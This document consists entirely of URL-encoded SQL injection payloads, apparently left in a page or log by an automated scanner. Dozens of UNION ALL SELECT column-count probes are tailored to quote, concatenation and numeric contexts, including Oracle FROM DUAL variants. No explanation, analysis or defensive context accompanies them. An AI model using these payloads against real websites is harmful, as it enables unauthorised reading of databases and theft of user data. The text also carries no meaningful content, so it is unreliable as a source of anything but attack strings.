-8851%27%29%20WHERE%209140%3D9140%20UNION%20ALL%20SELECT%209140%2C%209140%2C%209140%2C%209140%2C%209140%2C%209140%2C%209140%2C%209140%2C%209140%2C%209140%2C%209140%2C%209140%2C%209140%2C%209140%2C%209140%2C%209140%2C%209140%2C%209140%2C%209140%2C%209140%2C%209140%2C%209140%2C%209140%2C%209140%2C%209140%2C%209140%2C%209140%2C%209140%2C%209140%23 -6445%27%29%20WHERE%206483%3D6483%20UNION%20ALL%20SELECT%206483%2C%206483%2C%206483%2C%206483%2C%206483%2C%206483%2C%206483%2C%206483%2C%206483%2C%206483%2C%206483%2C%206483%2C%206483%2C%206483%2C%206483%2C%206483%2C%206483%2C%206483%2C%206483%2C%206483%2C%206483%2C%206483%2C%206483%2C%206483%2C%206483%2C%206483%2C%206483%2C%206483%2C%206483%2C%206483%23 -2941%27%20WHERE%207396%3D7396%20UNION%20ALL%20SELECT%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%2C%207396%23 -1519%27%20WHERE%207590%3D7590%20UNION%20ALL%20SELECT%207590%2C%207590%2C%207590%2C%207590%2C%207590%2C%207590%2C%207590%2C%207590%2C%207590%2C%207590%2C%207590%2C%207590%2C%207590%2C%207590%2C%207590%2C%207590%2C%207590%2C%207590%2C%207590%2C%207590%2C%207590%2C%207590%23 -3128%27%20WHERE%206539%3D6539%20UNION%20ALL%20SELECT%206539%2C%206539%2C%206539%2C%206539%2C%206539%2C%206539%2C%206539%2C%206539%2C%206539%2C%206539%2C%206539%2C%206539%2C%206539%2C%206539%2C%206539%2C%206539%2C%206539%2C%206539%2C%206539%2C%206539%2C%206539%2C%206539%2C%206539%23 -8259%27%20WHERE%205784%3D5784%20UNION%20ALL%20SELECT%205784%2C%205784%2C%205784%2C%205784%2C%205784%2C%205784%2C%205784%2C%205784%2C%205784%2C%205784%2C%205784%2C%205784%2C%205784%2C%205784%2C%205784%2C%205784%2C%205784%2C%205784%2C%205784%2C%205784%2C%205784%2C%205784%2C%205784%2C%205784%23 -9579%27%20WHERE%202446%3D2446%20UNION%20ALL%20SELECT%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%23 -3940%27%20WHERE%207353%3D7353%20UNION%20ALL%20SELECT%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%2C%207353%23 -2404%27%20WHERE%202355%3D2355%20UNION%20ALL%20SELECT%202355%2C%202355%2C%202355%2C%202355%2C%202355%2C%202355%2C%202355%2C%202355%2C%202355%2C%202355%2C%202355%2C%202355%2C%202355%2C%202355%2C%202355%2C%202355%2C%202355%2C%202355%2C%202355%2C%202355%2C%202355%2C%202355%2C%202355%2C%202355%2C%202355%2C%202355%2C%202355%23 -2485%27%20WHERE%209594%3D9594%20UNION%20ALL%20SELECT%209594%2C%209594%2C%209594%2C%209594%2C%209594%2C%209594%2C%209594%2C%209594%2C%209594%2C%209594%2C%209594%2C%209594%2C%209594%2C%209594%2C%209594%2C%209594%2C%209594%2C%209594%2C%209594%2C%209594%2C%209594%2C%209594%2C%209594%2C%209594%2C%209594%2C%209594%2C%209594%2C%209594%23 -1855%27%20WHERE%201647%3D1647%20UNION%20ALL%20SELECT%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%2C%201647%23 -8942%27%20WHERE%204719%3D4719%20UNION%20ALL%20SELECT%204719%2C%204719%2C%204719%2C%204719%2C%204719%2C%204719%2C%204719%2C%204719%2C%204719%2C%204719%2C%204719%2C%204719%2C%204719%2C%204719%2C%204719%2C%204719%2C%204719%2C%204719%2C%204719%2C%204719%2C%204719%2C%204719%2C%204719%2C%204719%2C%204719%2C%204719%2C%204719%2C%204719%2C%204719%2C%204719%23 -4484%22%20WHERE%201622%3D1622%20UNION%20ALL%20SELECT%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%2C%201622%23 -6523%22%20WHERE%209446%3D9446%20UNION%20ALL%20SELECT%209446%2C%209446%2C%209446%2C%209446%2C%209446%2C%209446%2C%209446%2C%209446%2C%209446%2C%209446%2C%209446%2C%209446%2C%209446%2C%209446%2C%209446%2C%209446%2C%209446%2C%209446%2C%209446%2C%209446%2C%209446%2C%209446%23 -9399%22%20WHERE%202128%3D2128%20UNION%20ALL%20SELECT%202128%2C%202128%2C%202128%2C%202128%2C%202128%2C%202128%2C%202128%2C%202128%2C%202128%2C%202128%2C%202128%2C%202128%2C%202128%2C%202128%2C%202128%2C%202128%2C%202128%2C%202128%2C%202128%2C%202128%2C%202128%2C%202128%2C%202128%23 -1894%22%20WHERE%207946%3D7946%20UNION%20ALL%20SELECT%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%23 -9545%22%20WHERE%207183%3D7183%20UNION%20ALL%20SELECT%207183%2C%207183%2C%207183%2C%207183%2C%207183%2C%207183%2C%207183%2C%207183%2C%207183%2C%207183%2C%207183%2C%207183%2C%207183%2C%207183%2C%207183%2C%207183%2C%207183%2C%207183%2C%207183%2C%207183%2C%207183%2C%207183%2C%207183%2C%207183%2C%207183%23 -4839%22%20WHERE%206114%3D6114%20UNION%20ALL%20SELECT%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%2C%206114%23 -3874%22%20WHERE%208210%3D8210%20UNION%20ALL%20SELECT%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%23 -8713%22%20WHERE%203559%3D3559%20UNION%20ALL%20SELECT%203559%2C%203559%2C%203559%2C%203559%2C%203559%2C%203559%2C%203559%2C%203559%2C%203559%2C%203559%2C%203559%2C%203559%2C%203559%2C%203559%2C%203559%2C%203559%2C%203559%2C%203559%2C%203559%2C%203559%2C%203559%2C%203559%2C%203559%2C%203559%2C%203559%2C%203559%2C%203559%2C%203559%23 -5309%22%20WHERE%208261%3D8261%20UNION%20ALL%20SELECT%208261%2C%208261%2C%208261%2C%208261%2C%208261%2C%208261%2C%208261%2C%208261%2C%208261%2C%208261%2C%208261%2C%208261%2C%208261%2C%208261%2C%208261%2C%208261%2C%208261%2C%208261%2C%208261%2C%208261%2C%208261%2C%208261%2C%208261%2C%208261%2C%208261%2C%208261%2C%208261%2C%208261%2C%208261%23 -2826%22%20WHERE%202072%3D2072%20UNION%20ALL%20SELECT%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%23 -5850%27%20%7C%7C%20%28SELECT%207760%20FROM%20DUAL%20WHERE%205364%3D5364%20UNION%20ALL%20SELECT%205364%2C%205364%2C%205364%2C%205364%2C%205364%2C%205364%2C%205364%2C%205364%2C%205364%2C%205364%2C%205364%2C%205364%2C%205364%2C%205364%2C%205364%2C%205364%2C%205364%2C%205364%2C%205364%2C%205364%2C%205364%23%20%29%20%7C%7C%20%27 -9407%27%20%7C%7C%20%28SELECT%201163%20FROM%20DUAL%20WHERE%205577%3D5577%20UNION%20ALL%20SELECT%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%2C%205577%23%20%29%20%7C%7C%20%27 -2597%27%20%7C%7C%20%28SELECT%204415%20FROM%20DUAL%20WHERE%205602%3D5602%20UNION%20ALL%20SELECT%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%2C%205602%23%20%29%20%7C%7C%20%27 -8048%27%20%7C%7C%20%28SELECT%203027%20FROM%20DUAL%20WHERE%204657%3D4657%20UNION%20ALL%20SELECT%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%23%20%29%20%7C%7C%20%27 -5611%27%20%7C%7C%20%28SELECT%206301%20FROM%20DUAL%20WHERE%202045%3D2045%20UNION%20ALL%20SELECT%202045%2C%202045%2C%202045%2C%202045%2C%202045%2C%202045%2C%202045%2C%202045%2C%202045%2C%202045%2C%202045%2C%202045%2C%202045%2C%202045%2C%202045%2C%202045%2C%202045%2C%202045%2C%202045%2C%202045%2C%202045%2C%202045%2C%202045%2C%202045%2C%202045%23%20%29%20%7C%7C%20%27 -2068%27%20%7C%7C%20%28SELECT%206344%20FROM%20DUAL%20WHERE%205594%3D5594%20UNION%20ALL%20SELECT%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%23%20%29%20%7C%7C%20%27 -3043%27%20%7C%7C%20%28SELECT%209471%20FROM%20DUAL%20WHERE%201400%3D1400%20UNION%20ALL%20SELECT%201400%2C%201400%2C%201400%2C%201400%2C%201400%2C%201400%2C%201400%2C%201400%2C%201400%2C%201400%2C%201400%2C%201400%2C%201400%2C%201400%2C%201400%2C%201400%2C%201400%2C%201400%2C%201400%2C%201400%2C%201400%2C%201400%2C%201400%2C%201400%2C%201400%2C%201400%2C%201400%23%20%29%20%7C%7C%20%27 -7116%27%20%7C%7C%20%28SELECT%208366%20FROM%20DUAL%20WHERE%201472%3D1472%20UNION%20ALL%20SELECT%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%23%20%29%20%7C%7C%20%27 -8294%27%20%7C%7C%20%28SELECT%206405%20FROM%20DUAL%20WHERE%208776%3D8776%20UNION%20ALL%20SELECT%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%23%20%29%20%7C%7C%20%27 -6587%27%20%7C%7C%20%28SELECT%208540%20FROM%20DUAL%20WHERE%208070%3D8070%20UNION%20ALL%20SELECT%208070%2C%208070%2C%208070%2C%208070%2C%208070%2C%208070%2C%208070%2C%208070%2C%208070%2C%208070%2C%208070%2C%208070%2C%208070%2C%208070%2C%208070%2C%208070%2C%208070%2C%208070%2C%208070%2C%208070%2C%208070%2C%208070%2C%208070%2C%208070%2C%208070%2C%208070%2C%208070%2C%208070%2C%208070%2C%208070%23%20%29%20%7C%7C%20%27 -4188%27%20%7C%7C%20%28SELECT%206166%20WHERE%207927%3D7927%20UNION%20ALL%20SELECT%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%23%20%29%20%7C%7C%20%27 -1745%27%20%7C%7C%20%28SELECT%206724%20WHERE%203577%3D3577%20UNION%20ALL%20SELECT%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%23%20%29%20%7C%7C%20%27 -4637%27%20%7C%7C%20%28SELECT%204386%20WHERE%205080%3D5080%20UNION%20ALL%20SELECT%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%2C%205080%23%20%29%20%7C%7C%20%27 -2385%27%20%7C%7C%20%28SELECT%209347%20WHERE%207617%3D7617%20UNION%20ALL%20SELECT%207617%2C%207617%2C%207617%2C%207617%2C%207617%2C%207617%2C%207617%2C%207617%2C%207617%2C%207617%2C%207617%2C%207617%2C%207617%2C%207617%2C%207617%2C%207617%2C%207617%2C%207617%2C%207617%2C%207617%2C%207617%2C%207617%2C%207617%2C%207617%23%20%29%20%7C%7C%20%27 -9439%27%20%7C%7C%20%28SELECT%204845%20WHERE%207602%3D7602%20UNION%20ALL%20SELECT%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%23%20%29%20%7C%7C%20%27 -8032%27%20%7C%7C%20%28SELECT%203830%20WHERE%204323%3D4323%20UNION%20ALL%20SELECT%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%2C%204323%23%20%29%20%7C%7C%20%27 -9951%27%20%7C%7C%20%28SELECT%205788%20WHERE%201354%3D1354%20UNION%20ALL%20SELECT%201354%2C%201354%2C%201354%2C%201354%2C%201354%2C%201354%2C%201354%2C%201354%2C%201354%2C%201354%2C%201354%2C%201354%2C%201354%2C%201354%2C%201354%2C%201354%2C%201354%2C%201354%2C%201354%2C%201354%2C%201354%2C%201354%2C%201354%2C%201354%2C%201354%2C%201354%2C%201354%23%20%29%20%7C%7C%20%27 -1014%27%20%7C%7C%20%28SELECT%203507%20WHERE%203052%3D3052%20UNION%20ALL%20SELECT%203052%2C%203052%2C%203052%2C%203052%2C%203052%2C%203052%2C%203052%2C%203052%2C%203052%2C%203052%2C%203052%2C%203052%2C%203052%2C%203052%2C%203052%2C%203052%2C%203052%2C%203052%2C%203052%2C%203052%2C%203052%2C%203052%2C%203052%2C%203052%2C%203052%2C%203052%2C%203052%2C%203052%23%20%29%20%7C%7C%20%27 -8018%27%20%7C%7C%20%28SELECT%206967%20WHERE%205325%3D5325%20UNION%20ALL%20SELECT%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%23%20%29%20%7C%7C%20%27 -6631%27%20%7C%7C%20%28SELECT%205298%20WHERE%209813%3D9813%20UNION%20ALL%20SELECT%209813%2C%209813%2C%209813%2C%209813%2C%209813%2C%209813%2C%209813%2C%209813%2C%209813%2C%209813%2C%209813%2C%209813%2C%209813%2C%209813%2C%209813%2C%209813%2C%209813%2C%209813%2C%209813%2C%209813%2C%209813%2C%209813%2C%209813%2C%209813%2C%209813%2C%209813%2C%209813%2C%209813%2C%209813%2C%209813%23%20%29%20%7C%7C%20%27 -5472%20%2B%20%28SELECT%201126%20FROM%20DUAL%20WHERE%206139%3D6139%20UNION%20ALL%20SELECT%206139%2C%206139%2C%206139%2C%206139%2C%206139%2C%206139%2C%206139%2C%206139%2C%206139%2C%206139%2C%206139%2C%206139%2C%206139%2C%206139%2C%206139%2C%206139%2C%206139%2C%206139%2C%206139%2C%206139%2C%206139%23%20%29 -3006%20%2B%20%28SELECT%201600%20FROM%20DUAL%20WHERE%206905%3D6905%20UNION%20ALL%20SELECT%206905%2C%206905%2C%206905%2C%206905%2C%206905%2C%206905%2C%206905%2C%206905%2C%206905%2C%206905%2C%206905%2C%206905%2C%206905%2C%206905%2C%206905%2C%206905%2C%206905%2C%206905%2C%206905%2C%206905%2C%206905%2C%206905%23%20%29 -4696%20%2B%20%28SELECT%201775%20FROM%20DUAL%20WHERE%204681%3D4681%20UNION%20ALL%20SELECT%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%2C%204681%23%20%29 -5818%20%2B%20%28SELECT%205774%20FROM%20DUAL%20WHERE%209338%3D9338%20UNION%20ALL%20SELECT%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%23%20%29 -2645%20%2B%20%28SELECT%203227%20FROM%20DUAL%20WHERE%209064%3D9064%20UNION%20ALL%20SELECT%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%23%20%29 -5625%20%2B%20%28SELECT%203036%20FROM%20DUAL%20WHERE%207890%3D7890%20UNION%20ALL%20SELECT%207890%2C%207890%2C%207890%2C%207890%2C%207890%2C%207890%2C%207890%2C%207890%2C%207890%2C%207890%2C%207890%2C%207890%2C%207890%2C%207890%2C%207890%2C%207890%2C%207890%2C%207890%2C%207890%2C%207890%2C%207890%2C%207890%2C%207890%2C%207890%2C%207890%2C%207890%23%20%29 -5443%20%2B%20%28SELECT%205692%20FROM%20DUAL%20WHERE%208312%3D8312%20UNION%20ALL%20SELECT%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%2C%208312%23%20%29 -1914%20%2B%20%28SELECT%201793%20FROM%20DUAL%20WHERE%203299%3D3299%20UNION%20ALL%20SELECT%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299%2C%203299%23%20%29 -2787%20%2B%20%28SELECT%203267%20FROM%20DUAL%20WHERE%209632%3D9632%20UNION%20ALL%20SELECT%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%2C%209632%23%20%29 -7095%20%2B%20%28SELECT%202439%20FROM%20DUAL%20WHERE%206454%3D6454%20UNION%20ALL%20SELECT%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%23%20%29 -3924%20%2B%20%28SELECT%207853%20WHERE%204182%3D4182%20UNION%20ALL%20SELECT%204182%2C%204182%2C%204182%2C%204182%2C%204182%2C%204182%2C%204182%2C%204182%2C%204182%2C%204182%2C%204182%2C%204182%2C%204182%2C%204182%2C%204182%2C%204182%2C%204182%2C%204182%2C%204182%2C%204182%2C%204182%23%20%29 -9078%20%2B%20%28SELECT%207717%20WHERE%202796%3D2796%20UNION%20ALL%20SELECT%202796%2C%202796%2C%202796%2C%202796%2C%202796%2C%202796%2C%202796%2C%202796%2C%202796%2C%202796%2C%202796%2C%202796%2C%202796%2C%202796%2C%202796%2C%202796%2C%202796%2C%202796%2C%202796%2C%202796%2C%202796%2C%202796%23%20%29 -4984%20%2B%20%28SELECT%206257%20WHERE%209253%3D9253%20UNION%20ALL%20SELECT%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%2C%209253%23%20%29 -8895%20%2B%20%28SELECT%202363%20WHERE%207256%3D7256%20UNION%20ALL%20SELECT%207256%2C%207256%2C%207256%2C%207256%2C%207256%2C%207256%2C%207256%2C%207256%2C%207256%2C%207256%2C%207256%2C%207256%2C%207256%2C%207256%2C%207256%2C%207256%2C%207256%2C%207256%2C%207256%2C%207256%2C%207256%2C%207256%2C%207256%2C%207256%23%20%29 -4031%20%2B%20%28SELECT%201420%20WHERE%202551%3D2551%20UNION%20ALL%20SELECT%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%23%20%29 -9364%20%2B%20%28SELECT%209043%20WHERE%204768%3D4768%20UNION%20ALL%20SELECT%204768%2C%204768%2C%204768%2C%204768%2C%204768%2C%204768%2C%204768%2C%204768%2C%204768%2C%204768%2C%204768%2C%204768%2C%204768%2C%204768%2C%204768%2C%204768%2C%204768%2C%204768%2C%204768%2C%204768%2C%204768%2C%204768%2C%204768%2C%204768%2C%204768%2C%204768%23%20%29 -5083%20%2B%20%28SELECT%207527%20WHERE%203093%3D3093%20UNION%20ALL%20SELECT%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%23%20%29 -8982%20%2B%20%28SELECT%204683%20WHERE%206625%3D6625%20UNION%20ALL%20SELECT%206625%2C%206625%2C%206625%2C%206625%2C%206625%2C%206625%2C%206625%2C%206625%2C%206625%2C%206625%2C%206625%2C%206625%2C%206625%2C%206625%2C%206625%2C%206625%2C%206625%2C%206625%2C%206625%2C%206625%2C%206625%2C%206625%2C%206625%2C%206625%2C%206625%2C%206625%2C%206625%2C%206625%23%20%29 -5259%20%2B%20%28SELECT%207606%20WHERE%203066%3D3066%20UNION%20ALL%20SELECT%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066%2C%203066%23%20%29 -6273%20%2B%20%28SELECT%208525%20WHERE%205786%3D5786%20UNION%20ALL%20SELECT%205786%2C%205786%2C%205786%2C%205786%2C%205786%2C%205786%2C%205786%2C%205786%2C%205786%2C%205786%2C%205786%2C%205786%2C%205786%2C%205786%2C%205786%2C%205786%2C%205786%2C%205786%2C%205786%2C%205786%2C%205786%2C%205786%2C%205786%2C%205786%2C%205786%2C%205786%2C%205786%2C%205786%2C%205786%2C%205786%23%20%29 -2638%27%20%2B%20%28SELECT%20%27Davy%27%20FROM%20DUAL%20WHERE%203001%3D3001%20UNION%20ALL%20SELECT%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%23%20%29%20%2B%20%27 -2400%27%20%2B%20%28SELECT%20%27iWfV%27%20FROM%20DUAL%20WHERE%201462%3D1462%20UNION%20ALL%20SELECT%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462%23%20%29%20%2B%20%27 -6546%27%20%2B%20%28SELECT%20%27RvDu%27%20FROM%20DUAL%20WHERE%207541%3D7541%20UNION%20ALL%20SELECT%207541%2C%207541%2C%207541%2C%207541%2C%207541%2C%207541%2C%207541%2C%207541%2C%207541%2C%207541%2C%207541%2C%207541%2C%207541%2C%207541%2C%207541%2C%207541%2C%207541%2C%207541%2C%207541%2C%207541%2C%207541%2C%207541%2C%207541%23%20%29%20%2B%20%27 -7048%27%20%2B%20%28SELECT%20%27qkAE%27%20FROM%20DUAL%20WHERE%208331%3D8331%20UNION%20ALL%20SELECT%208331%2C%208331%2C%208331%2C%208331%2C%208331%2C%208331%2C%208331%2C%208331%2C%208331%2C%208331%2C%208331%2C%208331%2C%208331%2C%208331%2C%208331%2C%208331%2C%208331%2C%208331%2C%208331%2C%208331%2C%208331%2C%208331%2C%208331%2C%208331%23%20%29%20%2B%20%27 -1099%27%20%2B%20%28SELECT%20%27MTAS%27%20FROM%20DUAL%20WHERE%208266%3D8266%20UNION%20ALL%20SELECT%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%2C%208266%23%20%29%20%2B%20%27 -8899%27%20%2B%20%28SELECT%20%27uTNU%27%20FROM%20DUAL%20WHERE%202122%3D2122%20UNION%20ALL%20SELECT%202122%2C%202122%2C%202122%2C%202122%2C%202122%2C%202122%2C%202122%2C%202122%2C%202122%2C%202122%2C%202122%2C%202122%2C%202122%2C%202122%2C%202122%2C%202122%2C%202122%2C%202122%2C%202122%2C%202122%2C%202122%2C%202122%2C%202122%2C%202122%2C%202122%2C%202122%23%20%29%20%2B%20%27 -8815%27%20%2B%20%28SELECT%20%27LZoq%27%20FROM%20DUAL%20WHERE%209743%3D9743%20UNION%20ALL%20SELECT%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%2C%209743%23%20%29%20%2B%20%27 -1224%27%20%2B%20%28SELECT%20%27yAMA%27%20FROM%20DUAL%20WHERE%208527%3D8527%20UNION%20ALL%20SELECT%208527%2C%208527%2C%208527%2C%208527%2C%208527%2C%208527%2C%208527%2C%208527%2C%208527%2C%208527%2C%208527%2C%208527%2C%208527%2C%208527%2C%208527%2C%208527%2C%208527%2C%208527%2C%208527%2C%208527%2C%208527%2C%208527%2C%208527%2C%208527%2C%208527%2C%208527%2C%208527%2C%208527%23%20%29%20%2B%20%27 